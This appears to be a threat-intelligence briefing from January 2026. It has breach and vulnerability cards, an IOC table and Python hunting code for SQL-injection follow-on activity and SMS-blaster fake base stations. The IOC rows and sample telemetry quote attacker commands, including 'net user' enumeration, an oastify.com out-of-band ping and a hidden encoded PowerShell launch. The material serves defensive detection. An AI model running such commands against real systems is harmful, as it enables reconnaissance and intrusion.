Attackers Actively Probing RCE Vulnerability in Cisco Enterprise Communications Products
Type: Vulnerability | Severity: Critical | Likelihood: N/A | Prevalence: N/A
Published: January 21, 2026
Attackers Actively Probing RCE Vulnerability in Cisco Enterprise Communications Products

Attack Profile

Surface: Web-based management interface

Phases: Initial Access, Exploitation

MITRE: Initial Access; T1190 (Exploit Public-Facing Application)

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters: Successful exploitation gives remote code execution through the web-based management interface and privilege escalation to root, potentially giving attackers full control of affected devices.

Owner team:

Mitigation

Apply Cisco's security patch when available.

Immediate Actions

Monitor for exploitation attempts, review network traffic for suspicious activity.

Tags: Cisco, Unified Communications, RCE, Vulnerability
Menulux Turkish POS Platform Allegedly Breached, Exposing 93,000 Customer Records
Type: Data Breach | Severity: Medium | Likelihood: N/A | Prevalence: BreachForums
Published: January 21, 2026
Menulux Turkish POS Platform Allegedly Breached, Exposing 93,000 Customer Records

Attack Profile

Surface: POS platform

Phases:

MITRE:

Actors and Tooling

Threat Actors: 888

Malware/Tools:

Campaign:

Business Impact

Why it matters: Exposure of sensitive customer data including addresses, phone numbers, and potentially financial information from a POS system.

Owner team:

Mitigation

Immediate Actions

Tags: Data Breach, POS, Turkish
53,000 USA Driver License Images Allegedly for Sale on Exploit Forum
Type: Data Leak | Severity: Medium | Likelihood: N/A | Prevalence: Observed in October 2025, December 2025, and January 2026
Published: January 21, 2026
53,000 USA Driver License Images Allegedly for Sale on Exploit Forum

Attack Profile

Surface: Exploit Forum

Phases: Initial Access, Data Exfiltration

MITRE: Collection

Actors and Tooling

Threat Actors: SinCity

Malware/Tools:

Campaign:

Business Impact

Why it matters: The sale of driver license images enables identity theft and fraud. The actor's history suggests a broader pattern of selling illicit credentials and materials.

Owner team:

Mitigation

Immediate Actions

Tags: driver license, data leak, fraud, identity theft
PCComponentes Allegedly Breached, Exposing 16.3 Million Customer Records Including Payment Card Data
Type: Data Breach | Severity: Medium | Likelihood: N/A | Prevalence: Clear Web
Published: January 20, 2026
PCComponentes Allegedly Breached, Exposing 16.3 Million Customer Records Including Payment Card Data

Attack Profile

Surface: Customer Database

Phases:

MITRE:

Actors and Tooling

Threat Actors: daghetiaw

Malware/Tools:

Campaign:

Business Impact

Why it matters: The breach exposes sensitive customer data, including financial information, potentially leading to identity theft and financial fraud.

Owner team:

Mitigation

Immediate Actions

Tags: Data Breach, PCComponentes
Ransomware IOCs Lookup
Type: Ransomware | Severity: N/A | Likelihood: N/A | Prevalence: N/A
Published: January 20, 2026
Ransomware IOCs Lookup

Attack Profile

Surface:

Phases:

MITRE:

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters:

Owner team:

Mitigation

Immediate Actions

Tags: Ransomware, IOCs
Inter Partner Assistance Algeria Allegedly Hacked, Exposing Internal Systems, User Accounts, and Insurance Documents
Type: Data Breach | Severity: Medium | Likelihood: N/A | Prevalence: Clear Web
Published: January 20, 2026
Inter Partner Assistance Algeria Allegedly Hacked, Exposing Internal Systems, User Accounts, and Insurance Documents

Attack Profile

Surface: Internal Systems

Phases: Initial Access, Exploitation

MITRE: Initial Access

Actors and Tooling

Threat Actors: darrk07x (TEAM DARK 07X), JOKEIR 07X, DR SHELL 08X

Malware/Tools:

Campaign:

Business Impact

Why it matters: Exposure of citizen data and insurance documents poses a risk of identity theft and financial fraud.

Owner team:

Mitigation

Immediate Actions

Data Breach, Algeria, Insurance
Acuity Insurance Allegedly Breached, Exposing 9 Million Illinois Customer Records with Detailed Demographics
Data Breach Severity: Medium Likelihood: Prevalence:
PublishedJanuary 19, 2026
Updated

Attack Profile

Surface: acuity.com

Phases:

MITRE:

Actors and Tooling

Threat Actors: Solonik

Malware/Tools:

Campaign:

Business Impact

Why it matters: Exposure of sensitive customer data including PII and financial information. Potential for identity theft, fraud, and targeted attacks.

Owner team:

Mitigation

Immediate Actions

Data Breach, PII, Consumer Leads, Insurance
Fascist Forge Neo-Nazi Forum Database Allegedly Leaked with 2.3 Million Records
Data Breach Severity: Medium Likelihood: High Prevalence: Dark Web Forums
PublishedJanuary 19, 2026
Updated

Attack Profile

Surface: Online Forum Database

Phases: Initial Access, Data Collection, Exfiltration

MITRE: Collection, Exfiltration; T1005 (Data from Local System), T1041 (Exfiltration Over C2 Channel)

Actors and Tooling

Threat Actors: 0BITS

Malware/Tools: N/A

Campaign: ANTIFA Database Leak

Business Impact

Why it matters: The leaked data could be used for doxing, identity theft, and harassment of individuals associated with Fascist Forge. It also reveals the inner workings and communication of a network of white supremacists and accelerationist groups.

Owner team: N/A

Mitigation

Monitor dark web forums for further data dissemination. Review security practices for online forums to prevent similar breaches.

Immediate Actions

Monitor for misuse of compromised credentials.

data breach, neo-nazi, forum, leak
Malware Trends Report 2025: New Security Risks for Businesses in 2026
Severity: Likelihood: Prevalence:
Published
Updated
Summarizing the past year's threat landscape based on activity observed in ANY.RUN's Interactive Sandbox, this annual report provides insights into the most detected malware types, families, TTPs, and phishing threats of 2025. For additional insights, view ANY.RUN's quarterly malware trends reports.

Key Takeaways Summary: In 2025, ANY.RUN experienced significant growth alongside a rise in malicious activity. The numbers reflect substantial growth in deep investigations and in detections of evasive threats facilitated by the Interactive Sandbox. As investigation volume and behavioral visibility increase, 15K+ security teams gain earlier detection, richer […]

Source: ANY.RUN's Cybersecurity Blog.

Attack Profile

Surface:

Phases:

MITRE:

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters:

Owner team:

Mitigation

Immediate Actions

Spanish judge closes NSO Group spyware probe due to lack of cooperation from Israel
Cyber-espionage Severity: High Likelihood: High Prevalence: High
PublishedJanuary 22, 2026
Updated
The case dates to May 2022, when the court launched a probe into the alleged spying on devices belonging to Prime Minister Pedro Sánchez and Defence Minister Margarita Robles.

Attack Profile

Surface: Mobile Devices (Phones)

Phases: Weaponization, Delivery, Exploitation, Action on Objectives

MITRE: Initial Access, Execution, Collection; T1056.001 (Input Capture: Keylogging), delivered via Pegasus

Actors and Tooling

Threat Actors: NSO Group (Pegasus vendor); the operator behind the alleged infections was not established before the probe was closed

Malware/Tools: Pegasus

Campaign:

Business Impact

Why it matters: Highlights the potential for state-sponsored cyber-espionage and the challenges of international cooperation in investigations involving spyware technologies. Demonstrates the impact on government officials and civil society.

Owner team:

Mitigation

Enhanced mobile device security measures, investigation into the source of the attacks, diplomatic efforts to address the issues of spyware proliferation.

Immediate Actions

Review mobile device security posture. Monitor for similar activity.

NSO Group, Pegasus, cyber-espionage, spyware, Spain
Jordan used Cellebrite phone-hacking tools against activists critical of Gaza war, report finds
Government Misuse of Technology Severity: Likelihood: Prevalence: Known to be used in multiple countries including Russia, Nigeria, Botswana, Myanmar, Italy and Belarus.
PublishedJanuary 22, 2026
Updated
The findings, published by Citizen Lab Thursday, are based on the research institute’s digital forensic analysis of seized phones in four cases and Jordanian court records in three cases.

Attack Profile

Surface: Mobile Devices (iOS & Android)

Phases: Data Extraction, Forensics

MITRE: Collection T1005 - Data from Local System

Actors and Tooling

Threat Actors: Government of Jordan

Malware/Tools: Cellebrite

Campaign:

Business Impact

Why it matters: Demonstrates abuse of digital forensics tools against civil society and human rights defenders.

Owner team:

Mitigation

Cellebrite should implement watermarking and increase customer vetting.

Immediate Actions

Review and enhance data security practices.

Cellebrite, Jordan, activism
Greek police arrest scammers using fake cell tower hidden in car trunk
Cybercrime Severity: High Likelihood: High Prevalence: Increasing, previously reported in Thailand, Indonesia, Qatar, and the United Kingdom
PublishedJanuary 21, 2026
Updated
A vehicle search uncovered a mobile computing system hidden in the trunk and connected to a roof-mounted transmitter disguised as a shark-fin antenna.

Attack Profile

Surface: Mobile networks, SMS

Phases: Initial Access, Execution, Persistence, Collection, Exfiltration

MITRE: Initial Access, Collection, Command and Control; T1660 (Phishing, Mobile ATT&CK) for the smishing delivery

Actors and Tooling

Threat Actors: Chinese nationals (reportedly)

Malware/Tools: SMS blaster (rogue base station), DC-to-AC power converter

Campaign: N/A

Business Impact

Why it matters: This operation demonstrates a rapidly deployable scamming technique. A rogue base station forces nearby phones onto 2G, where the handset cannot authenticate the network, and pushes phishing SMS directly to them, bypassing carrier SMS filtering and sender-ID controls, to harvest credentials and payment data for fraud.

Owner team: N/A

Mitigation

Strengthen mobile network security, implement 2FA for sensitive transactions, educate users about phishing scams, monitor for rogue base stations.

Immediate Actions

Monitor mobile network traffic, investigate suspicious SMS activity, share threat intelligence with telecom providers.

SMS, Scams, phishing, Greece

Vulnerabilities

Exploitable CVEs and patch guidance.

Signal ID | CVE | Vendor/Product | CVSS | Exploited | Patch | Notes | Fix/Workaround | References
SIG-001 | CVE-2025-51683 | Mjobtime | Not specified | Yes | Yes (version 15.7.3 or later) | Blind SQL injection vulnerability | Patch application, restrict MSSQL access, disable xp_cmdshell | https://www.huntress.com/blog/hacked-construction-apps-bringing-down-jobsite-security
SIG-016 | CVE-2026-20045 | Cisco Unified Communications Manager, Cisco Unified Communications Manager Session Management Edition, Cisco Unified Communications Manager IM & Presence Service, Cisco Unity Connection, Cisco Webex Calling Dedicated Instance | 8.2 | Yes | Yes | Improper validation of user-supplied input in HTTP requests | Apply Cisco security patch | https://nvd.nist.gov/vuln/detail/CVE-2026-20045

Indicators of Compromise

Hunt-ready indicators with context, confidence, and expiry guidance.

Signal ID | Type | Value | Context | Kill Chain | Confidence | First Seen | Last Seen | Action | FP Risk | References
SIG-001 | URI | /Default.aspx/update_profile_Server | Web server logs | Initial Access | High | Feb 21, 2025 | Dec 20, 2025 | Monitor | Low | https://www.huntress.com/blog/hacked-construction-apps-bringing-down-jobsite-security
SIG-001 | Command Line | cmd /c net user | Executed commands | Lateral Movement | High | Feb 21, 2025 | Dec 20, 2025 | Block | Medium | https://www.huntress.com/blog/hacked-construction-apps-bringing-down-jobsite-security
SIG-001 | Command Line | ping ei0lwafp0h7178z7qer9r9oualgc45su.oastify.com | Executed commands (out-of-band callback) | Lateral Movement | High | Feb 21, 2025 | Dec 20, 2025 | Block | Medium | https://www.huntress.com/blog/hacked-construction-apps-bringing-down-jobsite-security
SIG-006 | File Name | Премия 2025.zip | ZIP archive ("Bonus 2025") containing malicious LNK | Initial Access | High | | | | |
SIG-006 | File Name | Документ_1_О_размере_годовой_премии.pdf.lnk | Malicious LNK file ("Document_1_On_the_size_of_the_annual_bonus") | Initial Access | High | | | | |
SIG-006 | IP Address | 46.149.71.230 | Remote server hosting malicious files | Execution | High | | | | |
SIG-006 | File Name | s.exe | DUPERUNNER implant | Execution | High | | | | |
SIG-006 | File Name | fontawesome_tld.woff | File downloaded by DUPERUNNER | Execution | Medium | | | | |
SIG-006 | File Name | fontawesome.woff | AdaptixC2 beacon disguised as a font file | Command and Control | Medium | | | | |
SIG-007 | File Name | AfghanistanIslamiEmirates.iso | Initial sample | Initial Access | High | Dec 23, 2025 | Dec 24, 2025 | Block/Monitor | Low | https://www.seqrite.com/blog/operation-nomad-leopard-targeted-spear-phishing-campaign-against-government-entities-in-afghanistan/
SIG-007 | File Name | Doc.pdf.lnk | Malicious LNK file | Execution, Persistence | High | | | Block/Monitor | Low | https://www.seqrite.com/blog/operation-nomad-leopard-targeted-spear-phishing-campaign-against-government-entities-in-afghanistan/
SIG-007 | File Name | img.jpg | FALSECUB payload | Execution | High | | | Block/Monitor | Low | https://www.seqrite.com/blog/operation-nomad-leopard-targeted-spear-phishing-campaign-against-government-entities-in-afghanistan/
SIG-011 | MD5 | 02ec920f0e4d4e2df98bb523f5a90d4c | | | | | | | |
SIG-011 | MD5 | 12c541f80f6a563f3ce4b9a665cb610f | | | | | | | |
SIG-011 | MD5 | 6a02be4a99d0595e6ec6c1d9587cc8d8 | | | | | | | |
SIG-011 | MD5 | 6e30ce3e09f20e3a60c8aabb2a0fdc1c | | | | | | | |
SIG-011 | MD5 | 7a54f209d041272a73ed4316b3b106cb | | | | | | | |
SIG-026 | File Name | Cellebrite | Software/vendor name, not a specific file indicator | | | | | | |
SIG-027 | Domain | N/A | Phishing links in scam messages | Exfiltration | Low | N/A | N/A | Block | Low | https://therecord.media/greek-police-arrest-scammers-using-hidden-cell-towers
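Hunting logic for the SIG-001 rows above, as an added example that is not part of the briefing or of the Huntress write-up. It matches the POST URI in IIS W3C logs, normalises process command lines before comparing them with the listed commands, generalises the single oastify.com callback to any host under that domain (Burp Collaborator's out-of-band domain), and, as a further assumption beyond the table, flags any cmd.exe or powershell.exe spawned by sqlservr.exe, which is how xp_cmdshell runs its argument. The IIS field order, the process-event schema and the sample lines are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Indicators copied from the briefing's SIG-001 IOC rows.
SIG001_URI = "/Default.aspx/update_profile_Server"
SIG001_CMDLINES = {"cmd /c net user"}
# Generalisation (assumption): flag any host under oastify.com, the Burp
# Collaborator out-of-band domain, not only the one subdomain in the table.
OAST_HOST_RE = re.compile(r"\b[a-z0-9-]+\.oastify\.com\b", re.I)
# xp_cmdshell executes its argument through cmd.exe spawned by sqlservr.exe, so
# any shell whose parent is sqlservr.exe is worth a look (assumption: telemetry
# records the parent image).
SHELLS = {"cmd.exe", "powershell.exe"}

_FIRST_TOKEN = re.compile(r'\s*(?:"([^"]*)"|(\S+))\s*(.*)', re.S)


@dataclass(frozen=True)
class Hit:
    signal: str
    indicator: str
    evidence: str


def normalize_cmd(cmdline: str) -> str:
    """Reduce the executable to its bare name ('cmd'), collapse whitespace and
    lower-case, so '"C:\\Windows\\System32\\cmd.exe" /c  net user' equals the IOC."""
    m = _FIRST_TOKEN.match(cmdline)
    if not m:
        return ""
    exe = (m.group(1) or m.group(2) or "").rsplit("\\", 1)[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    rest = " ".join(m.group(3).split()).lower()
    return (exe + " " + rest).strip()


def scan_iis(lines: Iterable[str]) -> List[Hit]:
    """IIS W3C extended log; assumed field order:
    date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status."""
    hits = []
    for line in lines:
        if line.startswith("#"):          # directive/header lines
            continue
        f = line.split()
        if len(f) < 5:
            continue
        if f[3].upper() == "POST" and f[4].lower() == SIG001_URI.lower():
            hits.append(Hit("SIG-001", "uri:" + SIG001_URI, line))
    return hits


def scan_processes(events: Iterable[dict]) -> List[Hit]:
    """Process-creation events as dicts {'parent': path, 'image': path, 'cmdline': str} (assumed schema)."""
    hits = []
    for ev in events:
        cmd = normalize_cmd(ev["cmdline"])
        parent = ev.get("parent", "").rsplit("\\", 1)[-1].lower()
        image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
        if cmd in SIG001_CMDLINES:
            hits.append(Hit("SIG-001", "cmdline:" + cmd, ev["cmdline"]))
        m = OAST_HOST_RE.search(cmd)
        if m:
            hits.append(Hit("SIG-001", "oast:" + m.group(0), ev["cmdline"]))
        if parent == "sqlservr.exe" and image in SHELLS:
            hits.append(Hit("SIG-001", "sqlservr-spawned-shell", ev["cmdline"]))
    return hits


def hunt(iis_lines: Iterable[str], proc_events: Iterable[dict]) -> List[Hit]:
    return scan_iis(iis_lines) + scan_processes(proc_events)


# Constructed sample telemetry (not taken from the incidents).
SAMPLE_IIS = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2025-12-20 03:14:07 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.7 Mozilla/5.0 200",
    "2025-12-20 03:14:09 10.0.0.5 POST /Default.aspx/update_profile_Server - 443 - 198.51.100.7 python-requests/2.31 500",
    "2025-12-20 03:14:11 10.0.0.5 POST /default.aspx/update_profile_server - 443 - 198.51.100.7 python-requests/2.31 500",
    "2025-12-20 03:15:00 10.0.0.5 GET /images/logo.png - 443 - 203.0.113.9 Mozilla/5.0 200",
]
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_PROCS = [
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c net user'},
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c ping ei0lwafp0h7178z7qer9r9oualgc45su.oastify.com"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},
    {"parent": SQLSERVR, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc AAAA"},
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_IIS, SAMPLE_PROCS):
        print(f"{h.signal} {h.indicator:40} {h.evidence}")
```

The URI row is graded Monitor in the table, so a POST to that endpoint on its own is only a review item (the application itself uses it); a hit on the listed command lines, an oastify.com callback, or a shell spawned by sqlservr.exe is the strong signal and is what to page on.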

Detection Ideas

Queries and hunting logic for quick detection engineering.

Suspicious Job Application Activity

Log Sources

Email Logs, Application Logs, Network Traffic Logs

Data Prereqs

Access to application logs and email archives

Logic Summary

Monitor for suspicious job applications from unusual locations or with generic/automated content. Analyze email traffic for signs of social engineering.

Use Cases

  • Identify potential attackers using fake job applications.

FP Profile

False positives from legitimate applicants using automated tools or from regions with limited internet access.

Triage Notes

Prioritize investigations based on the reputation of the applicant and the sensitivity of the target systems.

Cellebrite Data Extraction

Log Sources

Mobile device logs, network traffic logs

Data Prereqs

Software inventory and process telemetry from managed devices; network telemetry; forensic data where available

Logic Summary

Hypothesis: Identify instances of data extraction from mobile devices using Cellebrite software based on logs and network traffic patterns. This could indicate unauthorized data access.

Use Cases

  • Detect if Cellebrite software is installed and running on employee devices.
  • Monitor network traffic for communication with Cellebrite servers.
  • Investigate potential data breaches involving mobile devices.

FP Profile

False positives may occur if Cellebrite is legitimately used for forensic analysis by authorized personnel.

Triage Notes

Verify legitimate use cases before escalating.

SMS Blaster Activity

Log Sources

Mobile network logs, SMS traffic data

Data Prereqs

Ability to monitor mobile network traffic and identify unusual SMS activity.

Logic Summary

Detect unusual SMS traffic patterns originating from a single device or location, including mass SMS sending and downgrading of network connections to 2G.

Use Cases

  • Identify rogue base stations and SMS blaster campaigns targeting mobile users.
  • Investigate reports of phishing SMS messages and trace their origin.
  • Monitor for indicators of compromise related to known SMS blaster equipment.

FP Profile

Legitimate SMS marketing campaigns or network maintenance activities.

Triage Notes

Investigate any alerts related to unusually high SMS traffic volume or downgrade to 2G.
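A worked form of the logic above, added here and not taken from the briefing or from the Greek police report. An SMS blaster is a fake base station, so the phishing texts it delivers never transit the operator's SMSC; what the operator can observe is a burst of handsets in one cell falling back to GSM (2G), and what subscribers or handset agents can report is the smishing sender. The detector buckets both streams per cell and alerts only when they coincide, which is what separates a blaster from a plain LTE outage (the FP profile above). The event schema and thresholds are assumptions and the data are constructed.

```python
from collections import defaultdict
from typing import Dict, List

# Thresholds are assumptions to tune per network; the schema of the two event
# streams is also assumed, not a real vendor export.
WINDOW_S = 300        # fixed bucket width in seconds
MIN_DOWNGRADES = 20   # distinct handsets dropping to GSM in one cell within a bucket
MIN_REPORTS = 5       # distinct handsets reporting the same SMS sender in that cell/bucket


def detect_blaster(rat_events: List[dict], sms_reports: List[dict],
                   window_s: int = WINDOW_S, min_downgrades: int = MIN_DOWNGRADES,
                   min_reports: int = MIN_REPORTS) -> List[Dict]:
    """rat_events:  {'ts': int, 'cell': str, 'ue': str, 'to': str}   ('to' == 'GSM' is a 2G downgrade)
    sms_reports: {'ts': int, 'cell': str, 'ue': str, 'sender': str} (subscriber/handset smishing reports)
    Returns one alert per (cell, bucket, sender) where both conditions hold."""
    downgraded = defaultdict(set)            # (cell, bucket) -> handsets that fell to GSM
    for e in rat_events:
        if e["to"] == "GSM":
            downgraded[(e["cell"], e["ts"] // window_s)].add(e["ue"])

    reported = defaultdict(set)              # (cell, bucket, sender) -> reporting handsets
    for r in sms_reports:
        b = r["ts"] // window_s
        # Reports lag delivery, so a report in bucket b also counts toward bucket b-1.
        for bucket in (b, b - 1):
            reported[(r["cell"], bucket, r["sender"])].add(r["ue"])

    alerts = []
    for (cell, bucket), ues in sorted(downgraded.items()):
        if len(ues) < min_downgrades:
            continue                         # a few 2G fallbacks per cell are normal
        for (c, b, sender), rues in reported.items():
            if (c, b) == (cell, bucket) and len(rues) >= min_reports:
                alerts.append({"cell": cell, "window_start": bucket * window_s,
                               "downgraded_ues": len(ues), "sender": sender,
                               "reports": len(rues)})
    return alerts


def constructed_sample():
    """Constructed test data, not from the Greek case."""
    rat, reports = [], []
    for k in range(30):          # cell A: 30 handsets pushed to GSM inside two minutes
        rat.append({"ts": 1000 + 4 * k, "cell": "A", "ue": f"ue-{k}", "to": "GSM"})
    for k in range(8):           # eight of them report the same smishing sender shortly after
        reports.append({"ts": 1150 + 10 * k, "cell": "A", "ue": f"ue-{k}", "sender": "PARCEL-INFO"})
    for k in range(25):          # cell C: 2G fallback storm with no reports (looks like an LTE outage)
        rat.append({"ts": 5000 + 2 * k, "cell": "C", "ue": f"ue-{k}", "to": "GSM"})
    for k in range(3):           # cell B: background noise
        rat.append({"ts": 1000 + k, "cell": "B", "ue": f"ue-{k}", "to": "GSM"})
    reports.append({"ts": 1005, "cell": "B", "ue": "ue-99", "sender": "PARCEL-INFO"})
    return rat, reports


if __name__ == "__main__":
    for alert in detect_blaster(*constructed_sample()):
        print(alert)
```

Only cell A fires: cell C has the downgrade storm but nobody reports a text, and cell B has reports without the downgrade burst. Fixed buckets with a one-bucket lag for reports are deliberately simple; a sliding window catches bursts that straddle a bucket boundary at the cost of deduplicating repeated alerts.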